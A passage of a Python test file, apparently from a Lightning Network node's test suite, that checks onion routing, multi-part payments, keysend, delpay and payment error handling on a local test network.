for h, n in zip(route[:-1], route[1:]):
# We tell the node h about the parameters to use for n (a.k.a. h + 1)
hops.append({
"pubkey": h['id'],
"payload": serialize_payload(n)
})
# The last hop has a special payload:
hops.append({
"pubkey": route[-1]['id'],
"payload": serialize_payload(route[-1])
})
onion = l1.rpc.createonion(hops=hops, assocdata=inv['payment_hash'])
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=inv['payment_hash'])
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'])
invs = l4.rpc.listinvoices(label="lbl")['invoices']
assert(len(invs) == 1 and invs[0]['status'] == 'paid')
pays = l1.rpc.listsendpays()['payments']
assert(len(pays) == 1 and pays[0]['status'] == 'complete'
and pays[0]['payment_hash'] == inv['payment_hash'])
# And now for a failing payment, using a payment_hash that doesn't match an
# invoice
payment_hash = "00" * 32
onion = l1.rpc.createonion(hops=hops, assocdata=payment_hash)
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=payment_hash)
try:
l1.rpc.waitsendpay(payment_hash=payment_hash)
raise ValueError()
except RpcError as e:
assert(e.error['code'] == 202)
assert(e.error['message'] == "Malformed error reply")
pays = l1.rpc.listsendpays(payment_hash=payment_hash)['payments']
assert(len(pays) == 1 and pays[0]['status'] == 'failed'
and pays[0]['payment_hash'] == payment_hash)
assert('erroronion' in pays[0])
# Fail onion is msg + padding = 256 + 2*2 byte lengths + 32 byte HMAC
assert(len(pays[0]['erroronion']) == (256 + 32 + 2 + 2) * 2)
# Let's try that again, this time we give it the shared_secrets so it
# should be able to decode the error.
payment_hash = "01" * 32
onion = l1.rpc.createonion(hops=hops, assocdata=payment_hash)
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=payment_hash,
shared_secrets=onion['shared_secrets'])
try:
l1.rpc.waitsendpay(payment_hash=payment_hash)
except RpcError as e:
assert(e.error['code'] == 204)
assert(e.error['data']['raw_message'] == "400f00000000000003e80000006c")
@pytest.mark.developer("needs dev-disconnect, dev-no-htlc-timeout")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_partial_payment(node_factory, bitcoind, executor):
# We want to test two payments at the same time, before we send commit
l1, l2, l3, l4 = node_factory.get_nodes(4, [{}] + [{'disconnect': ['=WIRE_UPDATE_ADD_HTLC-nocommit'], 'dev-no-htlc-timeout': None}] * 2 + [{'plugin': os.path.join(os.getcwd(), 'tests/plugins/print_htlc_onion.py')}])
# Two routes to l4: one via l2, and one via l3.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.fundchannel(l3, 100000)
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
scid24, _ = l2.fundchannel(l4, 100000)
l3.rpc.connect(l4.info['id'], 'localhost', l4.port)
scid34, _ = l3.fundchannel(l4, 100000)
bitcoind.generate_block(5)
# Wait until l1 knows about all channels.
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
inv = l4.rpc.invoice(1000, 'inv', 'inv')
paysecret = l4.rpc.decodepay(inv['bolt11'])['payment_secret']
# Separate routes for each part of the payment.
r134 = l1.rpc.getroute(l4.info['id'], 501, 1, exclude=[scid24 + '/0', scid24 + '/1'])['route']
r124 = l1.rpc.getroute(l4.info['id'], 499, 1, exclude=[scid34 + '/0', scid34 + '/1'])['route']
# These can happen in parallel.
l1.rpc.sendpay(route=r134, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
# Can't mix non-parallel payment!
with pytest.raises(RpcError, match=r'Already have parallel payment in progress'):
l1.rpc.sendpay(route=r124,
payment_hash=inv['payment_hash'],
msatoshi=499,
payment_secret=paysecret)
# It will not allow a parallel with different msatoshi!
with pytest.raises(RpcError, match=r'msatoshi was previously 1000msat, now 999msat'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=999, bolt11=inv['bolt11'],
payment_secret=paysecret, partid=2)
# This will work fine.
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=1000, bolt11=inv['bolt11'],
payment_secret=paysecret, partid=2)
# Any more would exceed total payment
with pytest.raises(RpcError, match=r'Already have 1000msat of 1000msat payments in progress'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=3)
# But repeat is a NOOP, as long as they're exactly the same!
with pytest.raises(RpcError, match=r'Already pending with amount 501msat \(not 499msat\)'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=r134, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
# Make sure they've done the suppress-commitment thing before we unsuppress
l2.daemon.wait_for_log(r'dev_disconnect')
l3.daemon.wait_for_log(r'dev_disconnect')
# Now continue, payments will succeed due to MPP.
l2.rpc.dev_reenable_commit(l4.info['id'])
l3.rpc.dev_reenable_commit(l4.info['id'])
res = l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], partid=1)
assert res['partid'] == 1
res = l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], partid=2)
assert res['partid'] == 2
for i in range(2):
line = l4.daemon.wait_for_log('print_htlc_onion.py: Got onion')
assert "'type': 'tlv'" in line
assert "'forward_amount': '499msat'" in line or "'forward_amount': '501msat'" in line
assert "'total_msat': '1000msat'" in line
assert "'payment_secret': '{}'".format(paysecret) in line
pay = only_one(l1.rpc.listpays()['pays'])
assert pay['bolt11'] == inv['bolt11']
assert pay['status'] == 'complete'
assert pay['number_of_parts'] == 2
assert pay['amount_sent_msat'] == Millisatoshi(1002)
# It will immediately succeed if we pay again.
pay = l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
assert pay['status'] == 'complete'
# If we try with an unknown partid, it will refuse.
with pytest.raises(RpcError, match=r'Already succeeded'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=3)
def test_partial_payment_timeout(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(1000, 'inv', 'inv')
paysecret = l2.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l2.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
with pytest.raises(RpcError, match=r'WIRE_MPP_TIMEOUT'):
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=70 + TIMEOUT // 4, partid=1)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 500msat out of 1000msat \(payment_secret\)')
# We can still pay it normally.
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=2)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 500msat out of 1000msat \(payment_secret\)')
l2.daemon.wait_for_log(r'HTLC set contains 2 HTLCs, for a total of 1000msat out of 1000msat \(payment_secret\)')
def test_partial_payment_restart(node_factory, bitcoind):
"""Test that we recover a set when we restart"""
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{}]
+ [{'may_reconnect': True}] * 2)
inv = l3.rpc.invoice(1000, 'inv', 'inv')
paysecret = l3.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l3.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
wait_for(lambda: [f['status'] for f in l2.rpc.listforwards()['forwards']] == ['offered'])
# Restart, and make sure it's reconnected to l2.
l3.restart()
print(l2.rpc.listpeers())
wait_for(lambda: [p['connected'] for p in l2.rpc.listpeers()['peers']] == [True, True])
# Pay second part.
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=2)
@pytest.mark.developer("needs dev-disconnect")
def test_partial_payment_htlc_loss(node_factory, bitcoind):
"""Test that we discard a set when the HTLC is lost"""
# We want l2 to fail once it has completed first htlc.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{},
{'disconnect': ['=WIRE_UPDATE_ADD_HTLC', '+WIRE_REVOKE_AND_ACK']},
{}])
inv = l3.rpc.invoice(1000, 'inv', 'inv')
paysecret = l3.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l3.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
wait_for(lambda: not only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected'])
l2.rpc.dev_fail(l3.info['id'])
# Since HTLC is missing from commit (dust), it's closed as soon as l2 sees
# it onchain. l3 shouldn't crash though.
bitcoind.generate_block(1, wait_for_mempool=1)
with pytest.raises(RpcError,
match=r'WIRE_PERMANENT_CHANNEL_FAILURE \(reply from remote\)'):
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
def test_createonion_limits(node_factory):
l1, = node_factory.get_nodes(1)
hops = [{
"pubkey": "02eec7245d6b7d2ccb30380bfbe2a3648cd7a942653f5aa340edcea1f283686619",
"payload": "00" * 228
}, {
"pubkey": "0324653eac434488002cc06bbfb7f10fe18991e35f9fe4302dbea6d2353dc0ab1c",
"payload": "00" * 228
}, {
"pubkey": "027f31ebc5462c1fdce1b737ecff52d37d75dea43ce11c74d25aa297165faa2007",
"payload": "00" * 228
}, {
"pubkey": "032c0b7cf95324a07d05398b240174dc0c2be444d96b159aa6c7f7b1e668680991",
"payload": "00" * 228
}, {
"pubkey": "02edabbd16b41c8371b92ef2f04c1185b4f03b6dcd52ba9b78d9d7c89c8f221145",
"payload": "00" * 228
}]
# This should success since it's right at the edge
l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
# This one should fail however
with pytest.raises(RpcError, match=r'Payloads exceed maximum onion packet size.'):
hops[0]['payload'] += '01'
l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
@pytest.mark.developer("needs use_shadow")
def test_blockheight_disagreement(node_factory, bitcoind, executor):
"""
While a payment is in-transit from payer to payee, a block
might be mined, so that the blockheight the payer used to
initiate the payment is no longer the blockheight when the
payee receives it.
This leads to a failure which *used* to be
`final_expiry_too_soon`, a non-permanent failure, but
which is *now* `incorrect_or_unknown_payment_details`,
a permanent failure.
`pay` treats permanent failures as, well, permanent, and
gives up on receiving such failure from the payee, but
this particular subcase of blockheight disagreement is
actually a non-permanent failure (the payer only needs
to synchronize to the same blockheight as the payee).
"""
l1, l2 = node_factory.line_graph(2)
sync_blockheight(bitcoind, [l1, l2])
# Arrange l1 to stop getting new blocks.
def no_more_blocks(req):
return {"result": None,
"error": {"code": -8, "message": "Block height out of range"}, "id": req['id']}
l1.daemon.rpcproxy.mock_rpc('getblockhash', no_more_blocks)
# Increase blockheight and make sure l2 knows it.
# Why 2? Because `pay` uses min_final_cltv_expiry + 1.
# But 2 blocks coming in close succession, plus slow
# forwarding nodes and block propagation, are still
# possible on the mainnet, thus this test.
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l2])
# Have l2 make an invoice.
inv = l2.rpc.invoice(1000, 'l', 'd')['bolt11']
# Have l1 pay l2
def pay(l1, inv):
l1.rpc.dev_pay(inv, use_shadow=False)
fut = executor.submit(pay, l1, inv)
# Make sure l1 sends out the HTLC.
l1.daemon.wait_for_logs([r'NEW:: HTLC LOCAL'])
# Unblock l1 from new blocks.
l1.daemon.rpcproxy.mock_rpc('getblockhash', None)
# pay command should complete without error
fut.result()
def test_sendpay_msatoshi_arg(node_factory):
"""sendpay msatoshi arg was used for non-MPP to indicate the amount
they asked for. But using it with anything other than the final amount
caused a crash in 0.8.0, so we then disallowed it.
"""
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(1000, 'inv', 'inv')
# Can't send non-MPP payment which specifies msatoshi != final.
with pytest.raises(RpcError, match=r'Do not specify msatoshi \(1001msat\) without'
' partid: if you do, it must be exactly'
r' the final amount \(1000msat\)'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1000, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1001, bolt11=inv['bolt11'])
with pytest.raises(RpcError, match=r'Do not specify msatoshi \(999msat\) without'
' partid: if you do, it must be exactly'
r' the final amount \(1000msat\)'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1000, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=999, bolt11=inv['bolt11'])
# Can't send MPP payment which pays any more than amount.
with pytest.raises(RpcError, match=r'Final amount 1001msat is greater than 1000msat, despite MPP'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1001, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], partid=1)
# But this works
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1001, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1001, bolt11=inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = only_one(l2.rpc.listinvoices('inv')['invoices'])
assert inv['status'] == 'paid'
assert inv['amount_received_msat'] == Millisatoshi(1001)
def test_reject_invalid_payload(node_factory):
"""Send an onion payload with an unknown even type.
Recipient l2 should reject it the incoming HTLC with an invalid onion
payload error.
"""
l1, l2 = node_factory.line_graph(2)
amt = 10**3
route = l1.rpc.getroute(l2.info['id'], amt, 10)['route']
inv = l2.rpc.invoice(amt, "lbl", "desc")
first_hop = route[0]
# A TLV payload with an unknown even type:
payload = TlvPayload()
payload.add_field(0xB000, b'Hi there')
hops = [{"pubkey": l2.info['id'], "payload": payload.to_hex()}]
onion = l1.rpc.createonion(hops=hops, assocdata=inv['payment_hash'])
l1.rpc.sendonion(onion=onion['onion'],
first_hop=first_hop,
payment_hash=inv['payment_hash'],
shared_secrets=onion['shared_secrets'])
l2.daemon.wait_for_log(r'Failing HTLC because of an invalid payload')
with pytest.raises(RpcError, match=r'WIRE_INVALID_ONION_PAYLOAD'):
l1.rpc.waitsendpay(inv['payment_hash'])
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs blinding args to sendpay")
def test_sendpay_blinding(node_factory):
l1, l2, l3, l4 = node_factory.line_graph(4)
blindedpathtool = os.path.join(os.path.dirname(__file__), "..", "devtools", "blindedpath")
# Create blinded path l2->l4
output = subprocess.check_output(
[blindedpathtool, '--simple-output', 'create',
l2.info['id'] + "/" + l2.get_channel_scid(l3),
l3.info['id'] + "/" + l3.get_channel_scid(l4),
l4.info['id']]
).decode('ASCII').strip()
# First line is blinding, then <peerid> then <encblob>.
blinding, p1, p1enc, p2, p2enc, p3 = output.split('\n')
# First hop can't be blinded!
assert p1 == l2.info['id']
amt = 10**3
inv = l4.rpc.invoice(amt, "lbl", "desc")
route = [{'id': l2.info['id'],
'channel': l1.get_channel_scid(l2),
'amount_msat': Millisatoshi(1002),
'delay': 21,
'blinding': blinding,
'enctlv': p1enc},
{'id': p2,
'amount_msat': Millisatoshi(1001),
'delay': 15,
# FIXME: this is a dummy!
'channel': '0x0x0',
'enctlv': p2enc},
{'id': p3,
# FIXME: this is a dummy!
'channel': '0x0x0',
'amount_msat': Millisatoshi(1000),
'delay': 9,
'style': 'tlv'}]
l1.rpc.sendpay(route=route,
payment_hash=inv['payment_hash'],
bolt11=inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
def test_excluded_adjacent_routehint(node_factory, bitcoind, compat):
"""Test case where we try have a routehint which leads to an adjacent
node, but the result exceeds our maxfee; we crashed trying to find
what part of the path was most expensive in that case
"""
l1, l2, l3 = node_factory.line_graph(3)
# We'll be forced to use routehint, since we don't know about l3.
wait_for(lambda: len(l3.rpc.listchannels(source=l2.info['id'])['channels']) == 1)
inv = l3.rpc.invoice(10**3, "lbl", "desc", exposeprivatechannels=l2.get_channel_scid(l3))
# This will make it reject the routehint.
err = r'Fee exceeds our fee budget: 1msat > 0msat, discarding route'
with pytest.raises(RpcError, match=err):
l1.rpc.pay(bolt11=inv['bolt11'], maxfeepercent=0, exemptfee=0)
def test_keysend(node_factory):
amt = 10000
l1, l2, l3, l4 = node_factory.line_graph(
4,
wait_for_announce=True,
opts=[{}, {}, {}, {'disable-plugin': 'keysend'}]
)
# The keysend featurebit must be set in the announcement, i.e., l1 should
# learn that l3 supports keysends.
features = l1.rpc.listnodes(l3.info['id'])['nodes'][0]['features']
assert(int(features, 16) >> 55 & 0x01 == 1)
# If we disable keysend, then the featurebit must not be set,
# i.e., l4 doesn't support it.
features = l1.rpc.listnodes(l4.info['id'])['nodes'][0]['features']
assert(int(features, 16) >> 55 & 0x01 == 0)
# Self-sends are not allowed (see #4438)
with pytest.raises(RpcError, match=r'We are the destination.'):
l1.rpc.keysend(l1.info['id'], amt)
# Send an indirect one from l1 to l3
l1.rpc.keysend(l3.info['id'], amt)
invs = l3.rpc.listinvoices()['invoices']
assert(len(invs) == 1)
inv = invs[0]
print(inv)
assert(inv['msatoshi_received'] >= amt)
# Now send a direct one instead from l1 to l2
l1.rpc.keysend(l2.info['id'], amt)
invs = l2.rpc.listinvoices()['invoices']
assert(len(invs) == 1)
inv = invs[0]
assert(inv['msatoshi_received'] >= amt)
# And finally try to send a keysend payment to l4, which doesn't
# support it. It MUST fail.
with pytest.raises(RpcError, match=r"Recipient [0-9a-f]{66} reported an invalid payload"):
l3.rpc.keysend(l4.info['id'], amt)
def test_invalid_onion_channel_update(node_factory):
'''
Some onion failures "should" send a `channel_update`.
This test checks to see if we handle things correctly
even if some remote node does not send the required
`channel_update`.
'''
plugin = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs_invalid.py')
l1, l2, l3 = node_factory.line_graph(3,
opts=[{},
{'plugin': plugin},
{}],
wait_for_announce=True)
l1id = l1.info['id']
inv = l3.rpc.invoice(12345, 'inv', 'inv')['bolt11']
# Should fail, since l2 will always fail to forward.
with pytest.raises(RpcError):
l1.rpc.pay(inv)
# l1 should still be alive afterwards.
assert l1.rpc.getinfo()['id'] == l1id
@pytest.mark.developer("Requires use_shadow")
def test_pay_exemptfee(node_factory, compat):
"""Tiny payment, huge fee
l1 -> l2 -> l3
Create a tiny invoice for 1 msat, it'll be dominated by the base_fee on
the l2->l3 channel. So it'll get rejected on the first attempt if we set
the exemptfee way too low. The default fee exemption threshold is
5000msat, so 5001msat is not exempted by default and a 5001msat fee on
l2->l3 should trigger this.
"""
l1, l2, l3 = node_factory.line_graph(
3,
opts=[{}, {'fee-base': 5001, 'fee-per-satoshi': 0}, {}],
wait_for_announce=True
)
err = r'Ran out of routes to try'
with pytest.raises(RpcError, match=err):
l1.rpc.dev_pay(l3.rpc.invoice(1, "lbl1", "desc")['bolt11'], use_shadow=False)
# If we tell our node that 5001msat is ok this should work
l1.rpc.dev_pay(l3.rpc.invoice(1, "lbl2", "desc")['bolt11'], use_shadow=False, exemptfee=5001)
# Given the above network this is the smallest amount that passes without
# the fee-exemption (notice that we let it through on equality).
threshold = int(5001 / 0.05)
# This should be just below the fee-exemption and is the first value that is allowed through
with pytest.raises(RpcError, match=err):
l1.rpc.dev_pay(l3.rpc.invoice(threshold - 1, "lbl3", "desc")['bolt11'], use_shadow=False)
# While this'll work just fine
l1.rpc.dev_pay(l3.rpc.invoice(int(5001 * 200), "lbl4", "desc")['bolt11'], use_shadow=False)
@pytest.mark.developer("Requires use_shadow flag")
def test_pay_peer(node_factory, bitcoind):
"""If we have a direct channel to the destination we should use that.
This is complicated a bit by not having sufficient capacity, but the
channel_hints can help us there.
l1 -> l2
| ^
v /
l3
"""
l1, l2, l3 = node_factory.get_nodes(3)
node_factory.join_nodes([l1, l2])
node_factory.join_nodes([l1, l3])
node_factory.join_nodes([l3, l2], wait_for_announce=True)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 6)
def spendable(n1, n2):
peer = n1.rpc.listpeers(n2.info['id'])['peers'][0]
chan = peer['channels'][0]
avail = chan['spendable_msat']
return avail
amt = Millisatoshi(10**8)
# How many payments do we expect to go through directly?
direct = spendable(l1, l2).millisatoshis // amt.millisatoshis
# Remember the l1 -> l3 capacity, it should not change until we run out of
# direct capacity.
l1l3cap = spendable(l1, l3)
for i in range(0, direct):
inv = l2.rpc.invoice(amt.millisatoshis, "lbl{}".format(i),
"desc{}".format(i))['bolt11']
l1.rpc.dev_pay(inv, use_shadow=False)
# We should not have more than amt in the direct channel anymore
assert(spendable(l1, l2) < amt)
assert(spendable(l1, l3) == l1l3cap)
# Next one should take the alternative, but it should still work
inv = l2.rpc.invoice(amt.millisatoshis, "final", "final")['bolt11']
l1.rpc.dev_pay(inv, use_shadow=False)
def test_mpp_presplit(node_factory):
"""Make a rather large payment of 5*10ksat and see it being split.
"""
MPP_TARGET_SIZE = 10**7 # Taken from libpluin-pay.c
amt = 5 * MPP_TARGET_SIZE
# Assert that the amount we're going to send is indeed larger than our
# split size.
assert(MPP_TARGET_SIZE < amt)
l1, l2, l3 = node_factory.line_graph(
3, fundamount=10**8, wait_for_announce=True,
opts={'wumbo': None}
)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')['bolt11']
p = l1.rpc.pay(inv)
assert(p['parts'] >= 5)
inv = l3.rpc.listinvoices()['invoices'][0]
assert(inv['msatoshi'] == inv['msatoshi_received'])
def test_mpp_adaptive(node_factory, bitcoind):
"""We have two paths, both too small on their own, let's combine them.
```dot
digraph {
l1 -> l2 [label="scid=103x1x1, cap=amt-1"];
l2 -> l4 [label="scid=105x1x1, cap=max"];
l1 -> l3 [label="scid=107x1x1, cap=max"];
l3 -> l4 [label="scid=109x1x1, cap=amt-1"];
}
"""
amt = 10**7 - 1
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.connect(l2)
l2.connect(l4)
l1.connect(l3)
l3.connect(l4)
# First roadblock right away on an outgoing channel
l2.fundchannel(l1, amt)
l2.fundchannel(l4, amt, wait_for_active=True)
l2.rpc.pay(l1.rpc.invoice(
amt + 99999000 - 1, # Slightly less than amt + reserve
label="reb l1->l2",
description="Rebalance l1 -> l2"
)['bolt11'])
# Second path fails only after the first hop
l1.fundchannel(l3, amt)
l4.fundchannel(l3, amt, wait_for_active=True)
l4.rpc.pay(l3.rpc.invoice(
amt + 99999000 - 1, # Slightly less than amt + reserve
label="reb l3->l4",
description="Rebalance l3 -> l4"
)['bolt11'])
l1.rpc.listpeers()
# Make sure neither channel can fit the payment by itself.
c12 = l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'][0]
c34 = l3.rpc.listpeers(l4.info['id'])['peers'][0]['channels'][0]
assert(c12['spendable_msat'].millisatoshis < amt)
assert(c34['spendable_msat'].millisatoshis < amt)
bitcoind.generate_block(5)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
inv = l4.rpc.invoice(
amt,
label="splittest",
description="Needs to be split into at least 2"
)['bolt11']
p = l1.rpc.pay(inv)
from pprint import pprint
pprint(p)
pprint(l1.rpc.paystatus(inv))
def test_pay_fail_unconfirmed_channel(node_factory, bitcoind):
'''
Replicate #3855.
`pay` crash when any direct channel is still
unconfirmed.
'''
l1, l2 = node_factory.get_nodes(2)
amount_sat = 10 ** 6
# create l2->l1 channel.
l2.fundwallet(amount_sat * 5)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.fundchannel(l1.info['id'], amount_sat * 3)
# channel is still unconfirmed.
# Attempt to pay from l1 to l2.
# This should fail since the channel capacities are wrong.
invl2 = l2.rpc.invoice(Millisatoshi(amount_sat * 1000), 'i', 'i')['bolt11']
with pytest.raises(RpcError):
l1.rpc.pay(invl2)
# Let the channel confirm.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
# Now give enough capacity so l1 can pay.
invl1 = l1.rpc.invoice(Millisatoshi(amount_sat * 2 * 1000), 'j', 'j')['bolt11']
l2.rpc.pay(invl1)
# Wait for us to recognize that the channel is available
wait_for(lambda: l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'].millisatoshis > amount_sat * 1000)
# Now l1 can pay to l2.
l1.rpc.pay(invl2)
def test_bolt11_null_after_pay(node_factory, bitcoind):
l1, l2 = node_factory.get_nodes(2)
amount_sat = 10 ** 6
# pay a generic bolt11 and test if the label bol11 is null
# inside the command listpays
# create l2->l1 channel.
l2.fundwallet(amount_sat * 5)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.fundchannel(l1.info['id'], amount_sat * 3)
# Let the channel confirm.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2])
wait_for(lambda: only_one(only_one(l1.rpc.listpeers()['peers'])['channels'])['state'] == 'CHANNELD_NORMAL')
amt = Millisatoshi(amount_sat * 2 * 1000)
invl1 = l1.rpc.invoice(amt, 'j', 'j')['bolt11']
l2.rpc.pay(invl1)
pays = l2.rpc.listpays()["pays"]
assert(pays[0]["bolt11"] == invl1)
assert('amount_msat' in pays[0] and pays[0]['amount_msat'] == amt)
assert('created_at' in pays[0])
def test_mpp_presplit_routehint_conflict(node_factory, bitcoind):
'''
We had a bug where pre-splitting the payment prevents *any*
routehints from being taken.
We tickle that bug here by building l1->l2->l3, but with
l2->l3 as an unpublished channel.
If the payment is large enough to trigger pre-splitting, the
routehints are not applied in any of the splits.
'''
l1, l2, l3 = node_factory.get_nodes(3)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1l2, _ = l1.fundchannel(l2, 10**7, announce_channel=True)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l3, 10**7, announce_channel=False)
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1, l2, l3])
# Wait for l3 to learn about l1->l2, otherwise it will think
# l2 is a deadend and not add it to the routehint.
wait_for(lambda: len(l3.rpc.listchannels(l1l2)['channels']) >= 2)
inv = l3.rpc.invoice(Millisatoshi(2 * 10000 * 1000), 'i', 'i', exposeprivatechannels=True)['bolt11']
l1.rpc.pay(inv)
def test_delpay_argument_invalid(node_factory, bitcoind):
"""
This test includes all possible combinations of input error inside the
delpay command.
"""
# Create the line graph l2 -> l1 with a channel of 10 ** 5 sat!
l2, l1 = node_factory.line_graph(2, fundamount=10**5, wait_for_announce=True)
with pytest.raises(RpcError):
l2.rpc.delpay()
# sanity check
inv = l1.rpc.invoice(10 ** 5, 'inv', 'inv')
payment_hash = "AA" * 32
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'complete')
l2.rpc.pay(inv['bolt11'])
wait_for(lambda: l2.rpc.listpays(inv['bolt11'])['pays'][0]['status'] == 'complete')
payment_hash = inv['payment_hash']
# payment paid with wrong status (pending status is a illegal input)
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'pending')
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'invalid_status')
with pytest.raises(RpcError):
l2.rpc.delpay(payment_hash, 'failed')
# test if the node is still ready
payments = l2.rpc.delpay(payment_hash, 'complete')
assert payments['payments'][0]['bolt11'] == inv['bolt11']
assert len(payments['payments']) == 1
assert len(l2.rpc.listpays()['pays']) == 0
def test_delpay_payment_split(node_factory, bitcoind):
"""
Test behavior of delpay with an MPP
"""
MPP_TARGET_SIZE = 10**7 # Taken from libpluin-pay.c
amt = 5 * MPP_TARGET_SIZE
l1, l2, l3 = node_factory.line_graph(3, fundamount=10**5,
wait_for_announce=True)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')
l1.rpc.pay(inv['bolt11'])
assert len(l1.rpc.listpays()['pays']) == 1
delpay_result = l1.rpc.delpay(inv['payment_hash'], 'complete')['payments']
assert len(delpay_result) >= 5
assert len(l1.rpc.listpays()['pays']) == 0
def test_listpay_result_with_paymod(node_factory, bitcoind):
"""
The object of this test is to verify the correct behavior
of the RPC command listpay e with two different type of
payment, such as: keysend (without invoice) and pay (with invoice).
l1 -> keysend -> l2
l2 -> pay invoice -> l3
"""
amount_sat = 10 ** 6
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
invl2 = l2.rpc.invoice(amount_sat * 2, "inv_l2", "inv_l2")
l1.rpc.pay(invl2['bolt11'])
l2.rpc.keysend(l3.info['id'], amount_sat * 2, "keysend_l3")
assert 'bolt11' in l1.rpc.listpays()['pays'][0]
assert 'bolt11' not in l2.rpc.listpays()['pays'][0]
assert 'payment_hash' in l2.rpc.listpays()['pays'][0]
assert 'payment_hash' in l1.rpc.listpays()['pays'][0]
assert 'destination' in l1.rpc.listpays()['pays'][0]
assert 'destination' in l2.rpc.listpays()['pays'][0]
